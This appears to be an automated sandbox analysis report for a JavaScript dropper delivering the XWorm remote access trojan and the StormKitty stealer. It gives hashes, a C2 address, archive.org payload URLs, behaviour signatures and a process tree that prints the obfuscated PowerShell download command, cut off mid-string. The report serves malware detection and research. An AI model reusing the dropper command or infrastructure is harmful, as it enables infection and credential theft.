Overview

overview

10

Static

static

1

c6b076cf47...168.js

windows7-x64

10

c6b076cf47...168.js

windows10-2004-x64

10

Analysis

  • max time kernel
    94s
  • max time network
    119s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-08-2024 01:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c6b076cf47cd1b57a71acfb1e5d257c657403af0ae983f4084a4057e18e81168.js

  • Size

    328KB

  • MD5

    6837307ec45d904b112be679217c4753

  • SHA1

    10e00ce374f8ebb3e54f6d26d99e8db6a6383e15

  • SHA256

    c6b076cf47cd1b57a71acfb1e5d257c657403af0ae983f4084a4057e18e81168

  • SHA512

    32087813f7826c052415592313a77a362033133034f0ad055480f063c4aa5d1de3da2e4bb38919da67f0f13e984d71f66c52455ed254634825f453f964717ef5

  • SSDEEP

    6144:O591JBdVhpcc1FRh1FZp2WlFBhlFJpkU1FxB1F5J2WlFhBlFpJAw1FRh1FZp2Wl6:O591JBdVhpcc1FRh1FZp2WlFBhlFJpkl

Score
10/10
stormkittyxwormcredential_accessdiscoveryexecutionpersistenceratstealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Extracted

Family

xworm

Version

5.0

C2

lisa22194141.duckdns.org:7000

Mutex

x8iJFYABjI83VZm2

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\c6b076cf47cd1b57a71acfb1e5d257c657403af0ae983f4084a4057e18e81168.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3136
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷YQBn㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷VQBy㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷JwBo㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bw㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷Og㏵ ⊷ ➟ ⇒ ▷v㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷aQBh㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷M㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷x㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷M㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷dQBz㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷YQBy㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷HY㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷cgBn㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷MQ㏵ ⊷ ➟ ⇒ ▷w㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷aQB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bQBz㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bo㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷bwB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷Xw㏵ ⊷ ➟ ⇒ ▷y㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Mg㏵ ⊷ ➟ ⇒ ▷0㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Nw㏵ ⊷ ➟ ⇒ ▷v㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQBh㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷Bu㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷agBw㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷dwBl㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷QwBs㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷ZQBu㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷TgBl㏵ ⊷ ➟ ⇒ ▷Hc㏵ ⊷ ➟ ⇒ ▷LQBP㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷agBl㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷eQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷TgBl㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷LgBX㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷YgBD㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷aQBl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷aQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷ZwBl㏵ ⊷ ➟ ⇒ ▷EI㏵ ⊷ ➟ ⇒ ▷eQB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷cw㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Hc㏵ ⊷ ➟ ⇒ ▷ZQBi㏵ ⊷ ➟ ⇒ ▷EM㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgB0㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷R㏵ ⊷ ➟ ⇒ ▷Bv㏵ ⊷ ➟ ⇒ ▷Hc㏵ ⊷ ➟ ⇒ ▷bgBs㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷YQBk㏵ ⊷ ➟ ⇒ ▷EQ㏵ ⊷ ➟ ⇒ ▷YQB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷K㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bQBh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQBV㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷p㏵ ⊷ ➟ ⇒ ▷Ds㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷YQBn㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷V㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷Bb㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷eQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷V㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷EU㏵ ⊷ ➟ ⇒ ▷bgBj㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷ZwBd㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷OgBV㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷Rg㏵ ⊷ ➟ ⇒ ▷4㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷RwBl㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷UwB0㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷aQBu㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷K㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bQBh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQBC㏵ ⊷ ➟ ⇒ ▷Hk㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷KQ㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷8㏵ ⊷ ➟ ⇒ ▷Dw㏵ ⊷ ➟ ⇒ ▷QgBB㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷RQ㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷XwBT㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷QQBS㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷Pg㏵ ⊷ ➟ ⇒ ▷+㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷Ow㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷8㏵ ⊷ ➟ ⇒ ▷Dw㏵ ⊷ ➟ ⇒ ▷QgBB㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷RQ㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷XwBF㏵ ⊷ ➟ ⇒ ▷E4㏵ ⊷ ➟ ⇒ ▷R㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷+㏵ ⊷ ➟ ⇒ ▷D4㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bQBh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQBU㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷B0㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷SQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷E8㏵ ⊷ ➟ ⇒ ▷Zg㏵ ⊷ ➟ ⇒ ▷o㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷KQ㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷ZQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷SQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷aQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷ZwBl㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷LgBJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷TwBm㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷BG㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷YQBn㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷Ow㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷BJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷BJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷Cs㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷LgBM㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgBn㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷YgBh㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷T㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷ZwB0㏵ ⊷ ➟ ⇒ ▷Gg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷BJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷YQBy㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷SQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷Ds㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bi㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cwBl㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷BD㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷aQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷ZwBl㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷LgBT㏵ ⊷ ➟ ⇒ ▷HU㏵ ⊷ ➟ ⇒ ▷YgBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷cgBp㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Zw㏵ ⊷ ➟ ⇒ ▷o㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bi㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cwBl㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷BM㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgBn㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷p㏵ ⊷ ➟ ⇒ ▷Ds㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bj㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷EI㏵ ⊷ ➟ ⇒ ▷eQB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷cw㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷Bb㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷eQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷QwBv㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷dgBl㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bd㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷OgBG㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷bwBt㏵ ⊷ ➟ ⇒ ▷EI㏵ ⊷ ➟ ⇒ ▷YQBz㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷Ng㏵ ⊷ ➟ ⇒ ▷0㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷By㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bgBn㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bi㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cwBl㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷BD㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ 